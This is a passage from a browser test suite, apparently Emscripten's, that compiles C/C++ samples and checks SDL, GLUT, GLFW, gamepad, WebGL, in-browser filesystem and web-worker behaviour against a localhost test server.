self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
